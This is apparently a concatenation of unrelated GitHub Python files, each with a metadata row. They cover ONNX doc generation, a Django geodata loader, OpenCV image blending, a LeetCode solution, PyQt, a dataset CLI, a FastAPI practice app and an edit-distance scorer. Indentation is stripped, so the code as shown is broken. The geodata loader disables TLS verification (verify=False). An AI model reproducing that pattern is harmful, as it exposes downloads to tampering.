if domain:
return domain
return "ai.onnx (default)"
def display_version_link(name: str, version: int, changelog: str) -> str:
name_with_ver = f"{name}-{version}"
return f'<a href="{changelog}#{name_with_ver}">{version}</a>'
def generate_formal_parameter_tags(formal_parameter: OpSchema.FormalParameter) -> str:
tags: List[str] = []
if OpSchema.FormalParameterOption.Optional == formal_parameter.option:
tags = ["optional"]
elif OpSchema.FormalParameterOption.Variadic == formal_parameter.option:
if formal_parameter.is_homogeneous:
tags = ["variadic"]
else:
tags = ["variadic", "heterogeneous"]
differentiable: OpSchema.DifferentiationCategory = (
OpSchema.DifferentiationCategory.Differentiable
)
non_differentiable: OpSchema.DifferentiationCategory = (
OpSchema.DifferentiationCategory.NonDifferentiable
)
if differentiable == formal_parameter.differentiation_category:
tags.append("differentiable")
elif non_differentiable == formal_parameter.differentiation_category:
tags.append("non-differentiable")
return "" if len(tags) == 0 else " (" + ", ".join(tags) + ")"
def display_schema(
schema: OpSchema, versions: Sequence[OpSchema], changelog: str
) -> str:
s = ""
# doc
if schema.doc:
s += "\n"
s += "\n".join(
(" " + line).rstrip() for line in schema.doc.lstrip().splitlines()
)
s += "\n"
# since version
s += "\n#### Version\n"
if schema.support_level == OpSchema.SupportType.EXPERIMENTAL:
s += "\nNo versioning maintained for experimental ops."
else:
s += (
"\nThis version of the operator has been "
+ ("deprecated" if schema.deprecated else "available")
+ f" since version {schema.since_version}"
)
s += f" of {display_domain(schema.domain)}.\n"
if len(versions) > 1:
# TODO: link to the Changelog.md
s += "\nOther versions of this operator: {}\n".format(
", ".join(
display_version_link(
format_name_with_domain(v.domain, v.name),
v.since_version,
changelog,
)
for v in versions[:-1]
)
)
# If this schema is deprecated, don't display any of the following sections
if schema.deprecated:
return s
# attributes
if schema.attributes:
s += "\n#### Attributes\n\n"
s += "<dl>\n"
for _, attr in sorted(schema.attributes.items()):
# option holds either required or default value
opt = ""
if attr.required:
opt = "required"
elif attr.default_value.name:
default_value = helper.get_attribute_value(attr.default_value)
doc_string = attr.default_value.doc_string
def format_value(value: Any) -> str:
if isinstance(value, float):
formatted = str(np.round(value, 5))
# use default formatting, unless too long.
if len(formatted) > 10: # noqa: PLR2004
formatted = str(f"({value:e})")
return formatted
if isinstance(value, (bytes, bytearray)):
return str(value.decode("utf-8"))
return str(value)
if isinstance(default_value, list):
default_value = [format_value(val) for val in default_value]
else:
default_value = format_value(default_value)
opt = f"default is {default_value}{doc_string}"
s += f"<dt><tt>{attr.name}</tt> : {display_attr_type(attr.type)}{f' ({opt})' if opt else ''}</dt>\n"
s += f"<dd>{attr.description}</dd>\n"
s += "</dl>\n"
# inputs
s += "\n#### Inputs"
if schema.min_input != schema.max_input:
s += f" ({display_number(schema.min_input)} - {display_number(schema.max_input)})"
s += "\n\n"
if schema.inputs:
s += "<dl>\n"
for input_ in schema.inputs:
option_str = generate_formal_parameter_tags(input_)
s += f"<dt><tt>{input_.name}</tt>{option_str} : {input_.type_str}</dt>\n"
s += f"<dd>{input_.description}</dd>\n"
s += "</dl>\n"
# outputs
s += "\n#### Outputs"
if schema.min_output != schema.max_output:
s += f" ({display_number(schema.min_output)} - {display_number(schema.max_output)})"
s += "\n\n"
if schema.outputs:
s += "<dl>\n"
for output in schema.outputs:
option_str = generate_formal_parameter_tags(output)
s += f"<dt><tt>{output.name}</tt>{option_str} : {output.type_str}</dt>\n"
s += f"<dd>{output.description}</dd>\n"
s += "</dl>\n"
# type constraints
s += "\n#### Type Constraints"
s += "\n\n"
if schema.type_constraints:
s += "<dl>\n"
for type_constraint in schema.type_constraints:
allowedTypes = type_constraint.allowed_type_strs
if len(allowedTypes) > 0:
allowedTypeStr = allowedTypes[0]
for allowedType in allowedTypes[1:]:
allowedTypeStr += ", " + allowedType
s += f"<dt><tt>{type_constraint.type_param_str}</tt> : {allowedTypeStr}</dt>\n"
s += f"<dd>{type_constraint.description}</dd>\n"
s += "</dl>\n"
# Function Body
# TODO: this should be refactored to show the function body graph's picture (DAG).
# if schema.has_function or schema.has_context_dependent_function: # type: ignore
# s += '\n#### Function\n'
# s += '\nThe Function can be represented as a function.\n'
return s
def support_level_str(level: OpSchema.SupportType) -> str:
return (
"<sub>experimental</sub> " if level == OpSchema.SupportType.EXPERIMENTAL else ""
)
class Args(NamedTuple):
output: str
changelog: str
def main(args: Args) -> None:
base_dir = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
)
docs_dir = os.path.join(base_dir, "docs")
with open(
os.path.join(docs_dir, args.changelog), "w", newline="", encoding="utf-8"
) as fout:
fout.write("<!--- SPDX-License-Identifier: Apache-2.0 -->\n")
fout.write("## Operator Changelog\n")
fout.write(
"*This file is automatically generated from the\n"
" [def files](/onnx/defs) via [this script](/onnx/defs/gen_doc.py).\n"
" Do not modify directly and instead edit operator definitions.*\n"
"\n"
"For an operator input/output's differentiability, it can be differentiable,\n"
" non-differentiable, or undefined. If a variable's differentiability\n"
" is not specified, that variable has undefined differentiability.\n"
)
# domain -> version -> [schema]
dv_index: Dict[str, Dict[int, List[OpSchema]]] = defaultdict(
lambda: defaultdict(list)
)
for schema in defs.get_all_schemas_with_history():
dv_index[schema.domain][schema.since_version].append(schema)
fout.write("\n")
for domain, versionmap in sorted(dv_index.items()):
if not should_render_domain(domain, args.output):
continue
s = f"# {display_domain_short(domain)}\n"
for version, unsorted_schemas in sorted(versionmap.items()):
s += f"## Version {version} of {display_domain(domain)}\n"
for schema in sorted(unsorted_schemas, key=lambda s: s.name):
name_with_ver = f"{format_name_with_domain(domain, schema.name)}-{schema.since_version}"
s += (
'### <a name="{}"></a>**{}**'
+ (" (deprecated)" if schema.deprecated else "")
+ "</a>\n"
).format(name_with_ver, name_with_ver)
s += display_schema(schema, [schema], args.changelog)
s += "\n"
fout.write(s)
with open(
os.path.join(docs_dir, args.output), "w", newline="", encoding="utf-8"
) as fout:
fout.write("<!--- SPDX-License-Identifier: Apache-2.0 -->\n")
fout.write("## Operator Schemas\n")
fout.write(
"*This file is automatically generated from the\n"
" [def files](/onnx/defs) via [this script](/onnx/defs/gen_doc.py).\n"
" Do not modify directly and instead edit operator definitions.*\n"
"\n"
"For an operator input/output's differentiability, it can be differentiable,\n"
" non-differentiable, or undefined. If a variable's differentiability\n"
" is not specified, that variable has undefined differentiability.\n"
)
# domain -> support level -> name -> [schema]
index: Dict[str, Dict[int, Dict[str, List[OpSchema]]]] = defaultdict(
lambda: defaultdict(lambda: defaultdict(list))
)
for schema in defs.get_all_schemas_with_history():
index[schema.domain][int(schema.support_level)][schema.name].append(schema)
fout.write("\n")
# Preprocess the Operator Schemas
# [(domain, [(support_level, [(schema name, current schema, all versions schemas)])])]
operator_schemas: List[
Tuple[str, List[Tuple[int, List[Tuple[str, OpSchema, List[OpSchema]]]]]]
] = []
existing_ops: Set[str] = set()
for domain, _supportmap in sorted(index.items()):
if not should_render_domain(domain, args.output):
continue
processed_supportmap = []
for _support, _namemap in sorted(_supportmap.items()):
processed_namemap = []
for n, unsorted_versions in sorted(_namemap.items()):
versions = sorted(unsorted_versions, key=lambda s: s.since_version)
schema = versions[-1]
if schema.name in existing_ops:
continue
existing_ops.add(schema.name)
processed_namemap.append((n, schema, versions))
processed_supportmap.append((_support, processed_namemap))
operator_schemas.append((domain, processed_supportmap))
# Table of contents
for domain, supportmap in operator_schemas:
s = f"### {display_domain_short(domain)}\n"
fout.write(s)
fout.write("|**Operator**|**Since version**||\n")
fout.write("|-|-|-|\n")
function_ops = []
for _, namemap in supportmap:
for n, schema, versions in namemap:
if schema.has_function or schema.has_context_dependent_function: # type: ignore
function_versions = schema.all_function_opset_versions # type: ignore
function_ops.append((n, schema, versions, function_versions))
continue
s = '|{}<a href="#{}">{}</a>{}|{}|\n'.format(
support_level_str(schema.support_level),
format_name_with_domain(domain, n),
format_name_with_domain(domain, n),
" (deprecated)" if schema.deprecated else "",
format_versions(versions, args.changelog),
)
fout.write(s)
if function_ops:
fout.write("|**Function**|**Since version**|**Function version**|\n")
for n, schema, versions, function_versions in function_ops:
s = '|{}<a href="#{}">{}</a>|{}|{}|\n'.format(
support_level_str(schema.support_level),
format_name_with_domain(domain, n),
format_name_with_domain(domain, n),
format_versions(versions, args.changelog),
format_function_versions(function_versions),
)
fout.write(s)
fout.write("\n")
fout.write("\n")
for domain, supportmap in operator_schemas:
s = f"## {display_domain_short(domain)}\n"
fout.write(s)
for _, namemap in supportmap:
for op_type, schema, versions in namemap:
# op_type
s = (
'### {}<a name="{}"></a><a name="{}">**{}**'
+ (" (deprecated)" if schema.deprecated else "")
+ "</a>\n"
).format(
support_level_str(schema.support_level),
format_name_with_domain(domain, op_type),
format_name_with_domain(domain, op_type.lower()),
format_name_with_domain(domain, op_type),
)
s += display_schema(schema, versions, args.changelog)
s += "\n\n"
if op_type in SNIPPETS:
s += "#### Examples\n\n"
for summary, code in sorted(SNIPPETS[op_type]):
s += "<details>\n"
s += f"<summary>{summary}</summary>\n\n"
s += f"```python\n{code}\n```\n\n"
s += "</details>\n"
s += "\n\n"
if op_type.lower() in SAMPLE_IMPLEMENTATIONS:
s += "#### Sample Implementation\n\n"
s += "<details>\n"
s += f"<summary>{op_type}</summary>\n\n"
s += f"```python\n{SAMPLE_IMPLEMENTATIONS[op_type.lower()]}\n```\n\n"
s += "</details>\n"
s += "\n\n"
fout.write(s)
if __name__ == "__main__":
if ONNX_ML:
main(
Args(
"Operators-ml.md",
"Changelog-ml.md",
)
)
main(
Args(
"Operators.md",
"Changelog.md",
)
)
| onnx/onnx | onnx/defs/gen_doc.py | gen_doc.py | py | 16,292 | python | en | code | 15,924 | github-code | 13 |
34774507074 | import os
import zipfile
from urllib.parse import urlsplit
import requests
from django.contrib.gis.gdal import DataSource, OGRGeomType
from django.contrib.gis.geos import MultiPolygon
from django.db import transaction
from signals.apps.dataset.base import AreaLoader
from signals.apps.signals.models import Area, AreaType
class CBSBoundariesLoader(AreaLoader):
"""
Load municipal (and neigbhorhood) boundaries as SIA Area instances.
"""
DATASET_URL = 'https://www.cbs.nl/-/media/cbs/dossiers/nederland-regionaal/wijk-en-buurtstatistieken/wijkbuurtkaart_2019_v1.zip' # noqa
# Unfortunately, these filenames are not uniformly named over the years,
# so a hard-coded mapping is provided for the most recent data file (as of
# this writing 2019).
DATASET_INFO = {
'cbs-gemeente-2019': {
'shp_file': 'gemeente_2019_v1.shp',
'code_field': 'GM_CODE',
'name_field': 'GM_NAAM',
},
'cbs-wijk-2019': {
'shp_file': 'wijk_2019_v1.shp',
'code_field': 'WK_CODE',
'name_field': 'WK_NAAM',
},
'cbs-buurt-2019': {
'shp_file': 'buurt_2019_v1.shp',
'code_field': 'BU_CODE',
'name_field': 'BU_NAAM',
}
}
PROVIDES = DATASET_INFO.keys()
def __init__(self, type_string, directory):
assert type_string in self.PROVIDES
self.area_type, _ = AreaType.objects.get_or_create(
name=type_string,
code=type_string,
description=f'{type_string} from CBS "Wijk- en buurtkaart" data.',
)
self.directory = directory # Data downloaded / processed here. Caller is responsible to clean-up directory.
dataset_info = self.DATASET_INFO[type_string]
self.data_file = dataset_info['shp_file']
self.code_field = dataset_info['code_field']
self.name_field = dataset_info['name_field']
def _download(self, zip_fullpath):
"""
Download relevant data file.
"""
if os.path.exists(zip_fullpath):
return # Datafile already downloaded.
with requests.get(self.DATASET_URL, stream=True, verify=False) as r:
r.raise_for_status()
with open(zip_fullpath, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
def _unzip(self, zip_fullpath):
"""
Extract ZIP file to temp_dir.
"""
with zipfile.ZipFile(zip_fullpath, 'r') as zf:
zf.extractall(path=self.directory)
def _load_cbs_data(self, data_fullpath):
"""
Load "gemeente", "wijk" or "buurt" areas from the CBS provided shapefiles.
"""
ds = DataSource(data_fullpath)
geom_by_code = {}
name_by_code = {}
polygon_type = OGRGeomType('Polygon')
multipolygon_type = OGRGeomType('MultiPolygon')
# Collect possible separate geometries representing the area of a signle
# municipality.
for feature in ds[0]:
code = feature.get(self.code_field)
name_by_code[code] = feature.get(self.name_field)
# Transform to WGS84 and merge if needed.
transformed = feature.geom.transform('WGS84', clone=True)
if code in geom_by_code:
geom_by_code[code].union(transformed)
else:
geom_by_code[code] = transformed
# Remove previously imported data, save our merged and transformed
# municipal boundaries to SIA DB.
with transaction.atomic():
Area.objects.filter(_type=self.area_type).delete()
for code, geometry in geom_by_code.items():
if geometry.geom_type == polygon_type:
geos_polygon = geometry.geos
geos_geometry = MultiPolygon(geos_polygon)
elif geometry.geom_type == multipolygon_type:
geos_geometry = geometry.geos
else:
raise Exception('Expected either polygon or multipolygon.')
Area.objects.create(
name=name_by_code[code],
code=code,
_type=self.area_type,
geometry=geos_geometry
)
def load(self):
split_url = urlsplit(self.DATASET_URL)
zip_name = os.path.split(split_url.path)[-1]
zip_fullpath = os.path.join(self.directory, zip_name)
data_fullpath = os.path.join(self.directory, self.data_file)
self._download(zip_fullpath)
self._unzip(zip_fullpath)
self._load_cbs_data(data_fullpath)
| Shoaib0023/signals | api/app/signals/apps/dataset/sources/cbs.py | cbs.py | py | 4,713 | python | en | code | 0 | github-code | 13 |
12653068890 | import cv2 as cv
# 加载两张图片
img1 = cv.imread('D:/PycharmProjects/pythonProject1/Opencv 4.5/images/color2.jpg')
img2 = cv.imread('D:/PycharmProjects/pythonProject1/Opencv 4.5/images/add2.jpg')
# 我想把logo放在左上角,所以我创建了ROI
rows, cols, channels = img2.shape
roi = img1[0:rows, 0:cols]
# 现在创建logo的掩码,并同时创建其相反掩码
img2gray = cv.cvtColor(img2, cv.COLOR_BGR2GRAY) # 把img2图像转换为灰度图像
# 隔离图像上像素的边缘,下面函数将大于10像素的值置为0,小于的置为255!!!
ret, mask = cv.threshold(img2gray, 10, 255, cv.THRESH_BINARY) # mask为掩膜
# 在cv2.thresh(src, thresh, maxval, type)中,type=cv.THRESH_BINARY为阈值的类型
# 1.cv2.THRESH_BINARY表示阈值的二值化操作,大于阈值使用maxval表示,小于阈值使用0表示
# 2.cv2.THRESH_BINARY_INV表示阈值的二值化翻转操作,大于阈值的使用0表示,小于阈值的使用最大值表示
# 3.cv2.THRESH_TRUNC表示进行截断操作,大于阈值的使用阈值表示,小于阈值的不变
# 4.cv2.THRESH_TOZERO表示进行化零操作,大于阈值的不变,小于阈值的使用0表示
# 5.cv2.THRESH_TOZERO_INV表示进行化零操作的翻转,大于阈值的使用0表示,小于阈值的不变
mask_inv = cv.bitwise_not(mask) # 按位非操作
# 现在将ROI中logo的区域涂黑
img1_bg = cv.bitwise_and(roi, roi, mask=mask_inv)
# 仅从logo图像中提取logo区域
img2_fg = cv.bitwise_and(img2, img2, mask=mask)
# 将logo放入ROI并修改主图像
dst = cv.add(img1_bg, img2_fg)
img1[0:rows, 0:cols] = dst
cv.imshow('res', img1)
cv.waitKey(0)
cv.destroyAllWindows() | Darling1116/Greeting_1116 | Opencv/lesson_3/Add_2.py | Add_2.py | py | 1,684 | python | zh | code | 0 | github-code | 13 |
41767926122 | class Solution:
def f(self, i, j, k):
if (i,j,k) in self.dp:
return self.dp[(i,j,k)]
if i == len(self.s1) and j == len(self.s2) and k == len(self.s3):
return True
r1 = False
r2 = False
if i < len(self.s1) and k < len(self.s3) and self.s1[i] == self.s3[k] :
r1 = self.f(i + 1, j, k + 1)
if j < len(self.s2) and k < len(self.s3) and self.s2[j] == self.s3[k] :
r2 = self.f(i, j + 1, k + 1)
self.dp[(i,j,k)] = r1 | r2
return r1 | r2
def isInterleave(self, s1: str, s2: str, s3: str) -> bool:
self.s1 = s1
self.s2 = s2
self.s3 = s3
self.dp = {}
return self.f(0, 0, 0)
| ritwik-deshpande/LeetCode | 97-interleaving-string/97-interleaving-string.py | 97-interleaving-string.py | py | 849 | python | en | code | 0 | github-code | 13 |
21840373651 | #!/usr/bin/env python3
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
def main():
app = QApplication(sys.argv)
win = QWidget()
label = QLabel(f"Welcome to Python Gui programming with PyQt {PYQT_VERSION_STR}")
btn = QPushButton("Quit!")
btn.setDefault(True)
layout = QHBoxLayout()
layout.addWidget(label)
layout.addWidget(btn)
btn.clicked.connect(qApp.quit)
win.setLayout(layout)
win.setWindowTitle("PyQt5 Programming")
win.move(100, 100)
win.show()
return app.exec()
if __name__ == "__main__":
main()
| mjbhobe/Image_Resources | Gnome/hello.py | hello.py | py | 615 | python | en | code | 0 | github-code | 13 |
73910573139 | import logging
import os
import sys
from collections import OrderedDict
from pathlib import Path
import click
import git
import inquirer
import ruamel.yaml
from ruamel.yaml.representer import RoundTripRepresenter
from dataherb.flora import Flora
from dataherb.parse.utils import (
IGNORED_FOLDERS_AND_FILES,
MESSAGE_CODE,
STATUS_CODE,
)
from dataherb.parse.model_yaml import MetaData
class MyRepresenter(RoundTripRepresenter):
pass
ruamel.yaml.add_representer(
OrderedDict, MyRepresenter.represent_dict, representer=MyRepresenter
)
yaml = ruamel.yaml.YAML()
yaml.Representer = MyRepresenter
__CWD__ = Path(__file__).parent.resolve()
logging.basicConfig()
logger = logging.getLogger("dataherb.command")
def describe_file(file):
questions = [
inquirer.Text("name", message=f"How would you like to name the file: {file}?"),
inquirer.Text("description", message=f"What is {file} about?"),
inquirer.Text(
"updated_at",
message=f"When was {file} last updated? In ISO date format such as 2020-02-17.",
),
]
answers = inquirer.prompt(questions)
meta = {
"name": answers.get("name"),
"description": answers.get("description"),
"updated_at": answers.get("updated_at"),
}
return meta
def describe_dataset():
"""
describe_dataset asks the user to specify some basic info about the dataset
"""
questions = [
inquirer.Text("name", message="How would you like to name the dataset?"),
inquirer.Text(
"description",
message="What is the dataset about? This will be the description of the dataset.",
),
]
answers = inquirer.prompt(questions)
meta = {
"name": answers.get("name", ""),
"description": answers.get("description", ""),
}
return meta
def where_is_dataset():
"""
where_is_dataset asks the user where the dataset is located.
"""
try:
folders = []
for root, dirs, files in os.walk(__CWD__):
for d in dirs:
if d not in IGNORED_FOLDERS_AND_FILES:
folders.append(os.path.relpath(os.path.join(root, d), "."))
except Exception as e:
logger.error("Can not get a list of folders in current directory.")
folders = []
folders = [i for i in folders if not i.startswith(".")]
if folders:
questions = [
inquirer.List(
"dataset_folder",
message="Which folder contains the data file?",
choices=folders,
)
]
else:
questions = [
inquirer.Path(
"dataset_folder",
message="Which folder will you place the data files?",
path_type=inquirer.Path.DIRECTORY,
)
]
answers = inquirer.prompt(questions)
dataset_folder = answers.get("dataset_folder")
return dataset_folder
# _FLORA.herb("geonames_timezone").leaves.get("dataset/geonames_timezone.csv").data
@click.group(invoke_without_command=True)
@click.pass_context
def dataherb(ctx):
if ctx.invoked_subcommand is None:
click.echo("Hello {}".format(os.environ.get("USER", "")))
click.echo("Welcome to DataHerb.")
else:
click.echo("Loading Service: %s" % ctx.invoked_subcommand)
@dataherb.command()
@click.argument("keywords", required=False)
@click.option("--id", "-i", default=False)
def search(id=None, keywords=None):
"""
search datasets on DataHerb by keywords or id
"""
SHOW_KEYS = ["name", "description", "contributors"]
fl = Flora()
if not id:
click.echo("Searching Herbs in DataHerb Flora ...")
results = fl.search(keywords)
click.echo(f"Found {len(results)} results")
if not results:
click.echo(f"Could not find dataset related to {keywords}")
else:
for result in results:
result_metadata = result.get("herb").metadata()
click.echo(f'DataHerb ID: {result_metadata.get("id")}')
click.echo(
yaml.dump(
OrderedDict((key, result_metadata[key]) for key in SHOW_KEYS),
sys.stdout,
)
)
else:
click.echo(f"Fetching Herbs {id} in DataHerb Flora ...")
result = fl.herb(id)
if not result:
click.echo(f"Could not find dataset with id {id}")
else:
result_metadata = result.metadata()
click.echo(f'DataHerb ID: {result_metadata.get("id")}')
click.echo(yaml.dump(result_metadata, sys.stdout))
@dataherb.command()
@click.argument("id", required=True)
def download(id):
"""
download dataset using id
"""
fl = Flora()
click.echo(f"Fetching Herbs {id} in DataHerb Flora ...")
result = fl.herb(id)
if not result:
click.echo(f"Could not find dataset with id {id}")
else:
result_metadata = result.metadata()
click.echo(f'Downloading DataHerb ID: {result_metadata.get("id")}')
result_repository = result_metadata.get("repository")
dest_folder = f"./{result_repository}"
if os.path.exists(dest_folder):
click.echo(f"Can not download dataset to {dest_folder}: folder exists.")
else:
dest_folder_parent = f"./{result_repository.split('/')[0]}"
os.makedirs(dest_folder_parent)
git.Git(dest_folder_parent).clone(
f"https://github.com/{result_repository}.git"
)
@dataherb.command()
@click.confirmation_option(
prompt=f"Your current working directory is {__CWD__}\n"
"The .dataherb folder will be created right here.\n"
"Are you sure this is the correct path?"
)
def create():
"""
creates metadata for current dataset
"""
md = MetaData()
dataset_basics = describe_dataset()
print(dataset_basics)
md.template.update(dataset_basics)
dataset_folder = where_is_dataset()
print(f"Looking into the folder {dataset_folder} for data files...")
dataset_files = md.parse_structure(dataset_folder)
print(f"found {dataset_files} in {dataset_folder}")
for file in dataset_files:
file_meta = describe_file(file)
md.append_leaf(os.path.join(dataset_folder, file), file_meta)
md.create()
click.echo(
"The .dataherb folder and metadata.yml file has been created inside \n"
f"{__CWD__}\n"
"Please review the metadata.yml file and update other necessary fields of your desire."
)
@dataherb.command()
@click.option("-v", "--verbose", type=str, default="warning")
def validate(verbose):
"""
validates the existing metadata for current dataset
"""
click.secho(
f"Your current working directory is {__CWD__}\n"
"I will look for the .dataherb folder right here.\n",
bold=True,
)
ALL_VERBOSE = ["warning", "error", "all"]
if verbose not in ALL_VERBOSE:
logger.error(f"-v or --verbose can only take one of {ALL_VERBOSE}")
md = MetaData()
validate = md.validate()
def echo_summary(key, value_dict, bg=None, fg=None):
if bg is None:
bg = "black"
if fg is None:
fg = "white"
return click.secho(
f' {key}: {value_dict.get("value")}\n'
f' STATUS: {value_dict.get("status")};\n'
f' MESSAGE: {value_dict.get("message")}',
bg=bg,
fg=fg,
)
click.secho("Summary: validating metadata:\n- data:", bold=True)
for val in validate.get("data"):
for val_key, val_val in val.items():
if (val_val.get("status") == STATUS_CODE["SUCCESS"]) and (verbose == "all"):
echo_summary(val_key, val_val, bg="green")
elif (val_val.get("status") == STATUS_CODE["WARNING"]) and (
verbose == "warning"
):
echo_summary(val_key, val_val, bg="magenta")
elif (val_val.get("status") == STATUS_CODE["ERROR"]) and (
verbose in ["warning", "error"]
):
echo_summary(val_key, val_val, bg="red")
click.secho(
"The .dataherb folder and metadata.yml file \n"
f"{__CWD__}\n"
" has been validated. Please read the summary and fix the errors.",
bold=True,
)
| DataHerb/dataherb-python | dataherb/deprecation/command.py | command.py | py | 8,475 | python | en | code | 3 | github-code | 13 |
23750440540 | # 1. Напишите программу, удаляющую из текста все слова, содержащие "абв". В тексте используется разделитель пробел.
# in
# Number of words: 10
# out
# авб абв бав абв вба бав вба абв абв абв
# авб бав вба бав вба
# in
# Number of words: 6
# out
# ваб вба абв ваб бва абв
# ваб вба ваб бва
import random
txt = input('Какое слово нужно удалить? ')
num_w = (int(input('Сколько составить слов: ')))
list_w = []
print('Tекст: ')
for i in range(num_w):
random_txt = random.sample(txt, 3)
list_w.append("".join(random_txt))
print(" ".join(list_w))
print("Полученный текст: ")
list_w2 = list(filter(lambda x: txt not in x, list_w))
print(" ".join(list_w2)) | YuliyaBorovaya/PythonHomework | HomeWork5/Task1.py | Task1.py | py | 887 | python | ru | code | 0 | github-code | 13 |
35654405968 | # -*- coding: utf-8 -*-
class BankNote(object):
"""Represent a note with a value"""
def __init__(self, value, front, back):
self.value = value
self.sides = [front, back]
note_10 = BankNote(10, 'img/10f.jpg', 'img/10b.jpg')
note_20 = BankNote(20, 'img/20f.jpg', 'img/20b.jpg')
note_50 = BankNote(50, 'img/50f.jpg', 'img/50b.jpg')
notes = {
10 : note_10,
20 : note_20,
50 : note_50
}
note_colors = {
"Yellow" : note_10,
"Red" : note_20,
"Green" : note_50
}
| Blondwolf/NoteCounterCHF | src/aborted/standalone/banknote.py | banknote.py | py | 511 | python | en | code | 0 | github-code | 13 |
3214482974 | from fastapi import FastAPI
from pydantic import BaseModel, Field
from uuid import UUID
import uvicorn
from typing import Optional
app = FastAPI()
#Field is for extra validation for our columns to gets input as expected.
class Book(BaseModel):
id: UUID
title: str = Field(min_length=1) # minimum length of title should be one
author: str = Field(min_length=1, max_length=100) # minium length of author should be 1 and Max should be 100
descripiton: Optional[str] = Field(title="Description of the book",
max_length=100,
min_length=1) # description
rating: int = Field(gt=-1, lt=101) # clients rating should be between 0-100 gt = greater then, lt = less then
class Config:
schema_extra = {
"example": {
"id":"ea5209b0-818c-4519-989b-0f10d8081a39",
"title": "Computer Science Pro",
"author": "learning with Rody",
"description": "A very nyc descripition of the book",
"rating": 100
}
}
BOOKS = []
@app.get('/book')
async def read_all_books(books_to_return: Optional[int] = None):
if not BOOKS:
create_books_no_api()
if books_to_return and len(BOOKS)>=books_to_return > 0:
i = 1
new_books = []
while i <= books_to_return:
new_books.append(BOOKS[i-1])
i +=1
return new_books
return BOOKS
@app.post('/')
async def create_book(book: Book):
BOOKS.append(book)
return BOOKS
@app.get("/book/{book_id}")
async def read_book(book_id:UUID):
for x in BOOKS:
if x.id == book_id:
return x
@app.put("/{book_id}")
async def update_book(bookd_id: UUID, book:Book):
for index,b in enumerate(BOOKS):
if b.id == bookd_id:
BOOKS[index] = book
return BOOKS
@app.delete("/book/{delete_book_id}")
async def delete_book(delete_book_id: UUID, book:Book):
for index, b in enumerate(BOOKS):
if b.id == delete_book_id:
BOOKS.pop(index)
return BOOKS
def create_books_no_api():
book1 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a19",
title = "Title 1",
author= "Author 1",
descripiton="Descripton 1",
rating= 60)
book2 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a29",
title = "Title 2",
author= "Author 3",
descripiton="Descripton 2",
rating= 70)
book3 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a39",
title = "Title 3",
author= "Author 3",
descripiton="Descripton 3",
rating= 80)
book4 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a39",
title = "Title 4",
author= "Author 4",
descripiton="Descripton 4",
rating= 90)
BOOKS.append(book1)
BOOKS.append(book2)
BOOKS.append(book3)
BOOKS.append(book4)
if __name__ == "__main__":
uvicorn.run("practice2:app", reload=True) | nvp1394/fast-api | Code Source/FastAPI/practice2.py | practice2.py | py | 3,159 | python | en | code | 0 | github-code | 13 |
74024440979 | import Levenshtein
import sys
import os
import re
PATH_OUTPUT_AUDIO_TEST = './' + sys.argv[1] + '/'
num_editops_list = []
num_normal_editops_list = []
num_wav_files = 0
dir_dict = {}
def calculate_edit_distance(path_output_audio_test, prediction_file_ending='prediction', max_number_points_to_plot=-1):
num_editops_list = []
num_normal_editops_list = []
num_wav_files = 0
dir_dict = {}
for e in os.listdir(path_output_audio_test):
if '.wav' in e:
num_wav_files += 1
if prediction_file_ending in e:
all_ids_file = ''.join(c for c in e if c.isdigit())
dir_dict[all_ids_file] = e
for e in sorted(list(dir_dict), key=int)[:max_number_points_to_plot]:
if prediction_file_ending in dir_dict[e]:
filename_prediction = dir_dict[e]
filename_label = filename_prediction.replace(prediction_file_ending, '_label')
with open(path_output_audio_test + filename_prediction, 'r') as f:
prediction_raw = f.read()
if len(sys.argv) > 2 and sys.argv[2] == '--except_predict_search':
try:
prediction = re.search('(\w(\ |\w|\')*\w)', prediction_raw).group(1)
except Exception:
pass
else:
prediction = re.search('(\w(\ |\w|\')*\w)', prediction_raw).group(1)
with open(path_output_audio_test + filename_label, 'r') as f:
label_raw = f.read()
label = re.search('(\w(\ |\w|\')*\w)', label_raw).group(1).replace('_', ' ')
editops = Levenshtein.editops(prediction, label)
print()
print(filename_prediction.replace(prediction_file_ending, ''))
print(prediction_file_ending + ': ' + prediction)
print('label: ' + label)
print('editops: ' + str(editops))
print('Normal Levenshtein distance: ' + str(len(editops)))
num_normal_editops_list.append(len(editops))
num_editops = 0
for e in editops:
num_editops += 1
if e[0] == 'replace':
num_editops += 1
print('insert-delete-editdistance (num_editops): ' + str(num_editops))
num_editops_list.append(num_editops)
avg_num_editops = (sum(num_editops_list)/len(num_editops_list))
avg_num_normal_editops = (sum(num_normal_editops_list)/len(num_normal_editops_list))
print('\n\n')
print('Number of .wav files: ' + str(num_wav_files))
print('Average number insert delete editops: **{:.2f}**'.format(avg_num_editops))
print('Average Levenshtein editops: **{:.2f}**'.format(avg_num_normal_editops))
return num_normal_editops_list
if __name__ == '__main__':
calculate_edit_distance(PATH_OUTPUT_AUDIO_TEST)
| Fraunhofer-AISEC/towards-resistant-audio-adversarial-examples | score.py | score.py | py | 2,845 | python | en | code | 9 | github-code | 13 |
18162686545 | # REF : https://leetcode.com/problems/validate-binary-search-tree/
# NOTES :
# Need to compare given node with updated UPPER BOUND and LOWER BOUND
# Like "Count good nodes in BT" deque stack will have now two more elements
# [node, low, high] to implement iterative DFS/BFS solution
from collections import deque
# T: O(n)
# S: O(n)
# DFS recursive
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isValidBST(self, root) -> bool:
def valid(node, low, high):
if node is None:
return True
if not (node.val < high and node.val > low):
return False
return (valid(node.left, low, node.val) and
valid(node.right, node.val, high))
return valid(root, float("-inf"), float("inf"))
# T: O(n)
# S: O(n)
# DFS iterative & BFS iterative with popleft change
class Solution2:
def isValidBST(self, root) -> bool:
if root is None:
return True
s = deque()
s.append([root, float("-inf"), float("inf")])
while s:
node, low, high = s.pop() # BFS with popleft
if not (node.val < high and node.val > low):
return False
if node.left:
s.append([node.left, low, node.val])
if node.right:
s.append([node.right, node.val, high])
return True
def main():
pass
if __name__ == "__main__":
main() | PawanKmr470/dsa | py_drill/Problems/TR01_ValidateBST.py | TR01_ValidateBST.py | py | 1,601 | python | en | code | 0 | github-code | 13 |
32810860961 | import json
